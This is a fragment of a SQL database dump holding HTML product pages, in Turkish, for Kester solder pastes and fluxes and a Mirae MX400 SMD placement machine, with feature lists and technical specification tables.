/>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start; margin-left: 30px;\"><strong style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Standart&nbsp;Flux Dolgu Boyutları</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/Kester_Standart%20core%20sizes.png\" alt=\"\" width=\"254\" height=\"160\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>','275-Sn60Pb40','','','','245-k100-28-29'),(32,'Lead-free Solder Paste','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER NXG1 LEAD-FREE SOLDER PASTE</strong></p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Tüm KESTER krem lehim formülleri mevcut en yüksek kaliteli saf materyaller kullanılarak üretilir. KESTER\'in dünya çapındaki araştırma tesislerinin birlikte çalışarak hazırladıkları krem lehim formülleri, tüm elektronik üreticilerine en son teknolojik gelişmeleri getirir.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><img src=\"images/kester/Kester_%20KremLehim.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>NXG1 KURŞUNSUZ KREM LEHİM</strong></p>\r\n<ul>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">KESTER NXG1, özellikle kurşunsuz lehimleme termal gereksinimleri düşünülerek üretilmiş</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Kurşun içermeyen</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Hava ve nitrojen ortamlarına uygun</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Temizleme gerektirmez</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Hassas bacak aralıklı malzemeleriniz (0.4mm pitch) için mükemmel baskı kalitesi verir</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">200mm/s\'ye kadar baskı hızı sağlar.</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">120dk mola sonra bile kusursuz krem lehim baskısı mümkündür.</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Uzun raf ömrü (8ay)</li>\r\n</ul>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: left;\">&nbsp;</p>\r\n<table style=\"margin-left: 30px;\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">ÜRÜN&nbsp;</td>\r\n<td style=\"margin-left: 30px;\">NXG1&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Viscosity (tipik)</td>\r\n<td style=\"margin-left: 30px;\">1850 poise&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;İlk tackiness</td>\r\n<td style=\"margin-left: 30px;\">46 gr&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">Sınıflandırma</td>\r\n<td style=\"margin-left: 30px;\">ROL1</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">Raf ömrü</td>\r\n<td style=\"margin-left: 30px;\">8 ay</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Wetting özelliği</td>\r\n<td>Mükemmel</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Baskı hızı</td>\r\n<td>200mm/sn kadar</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Elekten bırakma</td>\r\n<td>Mükemmel</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Reflow</td>\r\n<td>Hava veya Nitrojen</td>\r\n</tr>\r\n</tbody>\r\n</table>','NXG1','','','','krem-lehim-31'),(33,'Lead-free Solder paste','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER R276 LEAD-FREE SOLDER PASTE</strong></p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Tüm KESTER krem lehim formülleri mevcut en yüksek kaliteli saf materyaller kullanılarak üretilir. KESTER\'in dünya çapındaki araştırma tesislerinin birlikte çalışarak hazırladıkları krem lehim formülleri, tüm elektronik üreticilerine en son teknolojik gelişmeleri getirir.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><img src=\"images/kester/Kester_%20KremLehim.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>R276 KURŞUNSUZ KREM LEHİM</strong></p>\r\n<ul>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Kurşun içermez</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Hava ve nitrojen ortamlarına uygun</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Temizleme gerektirmez</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Hassas bacak aralıklı malzemeleriniz (0.4mm pitch) için mükemmel baskı kalitesi verir</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">200mm/s\'ye kadar baskı hızı sağlar.</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">120dk mola sonra bile kusursuz krem lehim baskısı mümkündür</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Krem lehim baskılı kartlar 8 saat bekleyebilir</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Uzun raf ömrü (6ay)</li>\r\n</ul>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: left;\">&nbsp;</p>\r\n<table style=\"margin-left: 30px;\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">ÜRÜN&nbsp;</td>\r\n<td style=\"margin-left: 30px;\">R276</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Viscosity (tipik)</td>\r\n<td style=\"margin-left: 30px;\">650 poise&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;İlk tackiness</td>\r\n<td style=\"margin-left: 30px;\">30 gr&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">Sınıflandırma</td>\r\n<td style=\"margin-left: 30px;\">ROL0</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">Raf ömrü</td>\r\n<td style=\"margin-left: 30px;\">6 ay</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Wetting özelliği</td>\r\n<td>Mükemmel</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Baskı hızı</td>\r\n<td>200mm/sn kadar</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Elekten bırakma</td>\r\n<td>Mükemmel</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Reflow</td>\r\n<td>Hava veya Nitrojen</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Dispensing&nbsp;</td>\r\n<td>Uygun</td>\r\n</tr>\r\n</tbody>\r\n</table>','R275-Leadfree','','','','krem-lehim-31-32'),(34,'Leaded Solder Paste','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER R276 LEADED SOLDER PASTE</strong></p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Tüm KESTER krem lehim formülleri mevcut en yüksek kaliteli saf materyaller kullanılarak üretilir. KESTER\'in dünya çapındaki araştırma tesislerinin birlikte çalışarak hazırladıkları krem lehim formülleri, tüm elektronik üreticilerine en son teknolojik gelişmeleri getirir.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><img src=\"images/kester/Kester_%20KremLehim.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>R276 KURŞUNSUZ KREM LEHİM</strong></p>\r\n<ul>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Kurşunlu üretilebilir</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Hava ve nitrojen ortamlarına uygun</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Temizleme gerektirmez</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Hassas bacak aralıklı malzemeleriniz (0.4mm pitch) için mükemmel baskı kalitesi verir</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">200mm/s\'ye kadar baskı hızı sağlar.</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">120dk mola sonra bile kusursuz krem lehim baskısı mümkündür</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Krem lehim baskılı kartlar 8 saat bekleyebilir</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Uzun raf ömrü (6ay)</li>\r\n</ul>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: left;\">&nbsp;</p>\r\n<table style=\"margin-left: 30px;\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">ÜRÜN&nbsp;</td>\r\n<td style=\"margin-left: 30px;\">R276</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Viscosity (tipik)</td>\r\n<td style=\"margin-left: 30px;\">670 poise&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;İlk tackiness</td>\r\n<td style=\"margin-left: 30px;\">32 gr&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">Sınıflandırma</td>\r\n<td style=\"margin-left: 30px;\">ROL0</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">Raf ömrü</td>\r\n<td style=\"margin-left: 30px;\">6 ay</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Wetting özelliği</td>\r\n<td>Mükemmel</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Baskı hızı</td>\r\n<td>200mm/sn kadar</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Elekten bırakma</td>\r\n<td>Mükemmel</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Reflow</td>\r\n<td>Hava veya Nitrojen</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Dispensing&nbsp;</td>\r\n<td>Uygun</td>\r\n</tr>\r\n</tbody>\r\n</table>','R275','','','','krem-lehim-31-32-33'),(35,'Leaded Solder Paste','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER R256 LEADED SOLDER PASTE</strong></p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Tüm KESTER krem lehim formülleri mevcut en yüksek kaliteli saf materyaller kullanılarak üretilir. KESTER\'in dünya çapındaki araştırma tesislerinin birlikte çalışarak hazırladıkları krem lehim formülleri, tüm elektronik üreticilerine en son teknolojik gelişmeleri getirir.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><img src=\"images/kester/Kester_%20KremLehim.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>R256 KURŞUNSUZ KREM LEHİM</strong></p>\r\n<ul>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Kurşunlu üretilebilir</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Hava ve nitrojen ortamlarına uygun</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Temizleme gerektirmez</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Hassas bacak aralıklı malzemeleriniz (0.4mm pitch) için mükemmel baskı kalitesi verir</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">200mm/s\'ye kadar baskı hızı sağlar.</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">120dk mola sonra bile kusursuz krem lehim baskısı mümkündür</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Krem lehim baskılı kartlar 8 saat bekleyebilir</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Uzun raf ömrü (6ay)</li>\r\n</ul>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: left;\">&nbsp;</p>\r\n<table style=\"margin-left: 30px;\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">ÜRÜN&nbsp;</td>\r\n<td style=\"margin-left: 30px;\">R256</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Viscosity (tipik)</td>\r\n<td style=\"margin-left: 30px;\">1400 poise&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;İlk tackiness</td>\r\n<td style=\"margin-left: 30px;\">40 gr&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">Sınıflandırma</td>\r\n<td style=\"margin-left: 30px;\">ROL0</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">Raf ömrü</td>\r\n<td style=\"margin-left: 30px;\">6 ay</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Wetting özelliği</td>\r\n<td>Mükemmel</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Baskı hızı</td>\r\n<td>200mm/sn kadar</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Elekten bırakma</td>\r\n<td>Mükemmel</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Reflow</td>\r\n<td>Hava veya Nitrojen</td>\r\n</tr>\r\n</tbody>\r\n</table>','R256','','','','krem-lehim-31-32-33-34'),(36,'Flux (Water-based)','<h5 style=\"text-align: left;\">KESTER WATER-BASED FLUX</h5>\r\n<p>&nbsp;</p>\r\n<hr class=\"system-pagebreak\" style=\"width: 1255.3125px; word-spacing: 0px;\" title=\"Ürün Bilgisi\" />\r\n<p>&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><img src=\"http://www.3s-technologies.com.tr/images/urunler/kester_flux.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>&nbsp;</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>979 FLUX</strong></p>\r\n<ul>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Su bazlı</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Organik</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Temizleme gerektirmiyen</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Yüksek kaliteli ve düşük arıza oranlı lehimleme gerçekleştirmek üzere geliştirilmiş bir flux</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">VOC içermeyen fluxlar içinde en iyi ıslatma ve en parlak lehim noktaları sağlamaktadır</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">KESTER 979 güvenilirlikten ödün vermeden mükemmel lehimleme özellikleri sunar.</li>\r\n</ul>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p>&nbsp;</p>\r\n<table style=\"margin-left: 30px;\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Ürün</td>\r\n<td style=\"text-align: center; margin-left: 30px;\">979&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Tip</td>\r\n<td style=\"text-align: center; margin-left: 30px;\">VOC-free&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;No-clean</td>\r\n<td style=\"text-align: center; margin-left: 30px;\">Evet&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>&nbsp;Specific Gravity</td>\r\n<td style=\"text-align: center;\">1.020 +/- 0.010&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Katı madde oranı</td>\r\n<td style=\"text-align: center;\">Tipik 4.5</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Asit numarası</td>\r\n<td style=\"text-align: center;\">40.0+/-3.0mg KOH/g</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>İnceltici</td>\r\n<td style=\"text-align: center;\">DI Su</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>','979','','','','955lc'),(38,'Flux (Alcohol-based)','<h5 style=\"text-align: left;\">KESTER ALCOHOL-BASED FLUX<span style=\"font-size: 16px; text-align: center;\">&nbsp;</span></h5>\r\n<hr class=\"system-pagebreak\" style=\"width: 1255.3125px; word-spacing: 0px;\" title=\"Ürün Bilgisi\" />\r\n<p>&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><img src=\"images/kester/kester_flux.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>&nbsp;</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>955LC FLUX</strong></p>\r\n<ul>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Alkol bazlı</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Düşük-katı maddeli</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Temizleme gerektirmiyen</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Yüksek kaliteli ve düşük arıza oranlı lehimleme gerçekleştirmek üzere geliştirilmiş bir flux</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Lehimleme sonrası bıraktığı atık minimumdur ve yapışkan değildir&nbsp;</li>\r\n</ul>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><span style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</span></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p>&nbsp;</p>\r\n<table style=\"margin-left: 30px;\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Ürün</td>\r\n<td style=\"text-align: center; margin-left: 30px;\">955LC</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Tip</td>\r\n<td style=\"text-align: center; margin-left: 30px;\">ORL0</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;No-clean</td>\r\n<td style=\"text-align: center; margin-left: 30px;\">Evet&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>&nbsp;Specific Gravity</td>\r\n<td style=\"text-align: center;\">0.806&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Katı madde oranı</td>\r\n<td style=\"text-align: center;\">Tipik 2.1</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Asit numarası</td>\r\n<td style=\"text-align: center;\">15</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>İnceltici</td>\r\n<td style=\"text-align: center;\">Thinner 108-S</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>','955LC','','','','955lc-37'),(39,'MX400 - IPC: 42,000cph','<h5 style=\"text-align: left;\"><span style=\"font-size: 0.83em; color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; line-height: 15.807999610900879px;\">Mirae Mx400/400P SMD Placement Machine&nbsp;</span></h5>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p>&nbsp;</p>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px;\"><img src=\"images/mirae/1226656899.jpg\" alt=\"\" border=\"0\" /><img src=\"images/mirae/Mirae%20Mx_400.JPG\" alt=\"\" width=\"300\" height=\"282\" />&nbsp;</td>\r\n<td style=\"font-size: 10px;\">\r\n<ul>\r\n<li><strong>İki kafa üzerine yerleştirilmiş altışar hızlı modül ile 42.000cph dizgi hızı&nbsp;(Mx400)</strong></li>\r\n<li><strong>6 eksen hızlı modül kafası ve 3 eksen esnek modül kafası ile 31.000cph dizgi&nbsp;hızı ve esnek üretim (Mx400P)</strong></li>\r\n<li><strong>Kompakt&nbsp;boyutları ile sınıfında birim alana&nbsp;&nbsp;&nbsp; maksimum üretkenlik</strong></li>\r\n<li><strong>Çiftli konveyör sistemi ile aynı anda iki PCB\'nin dizgisini 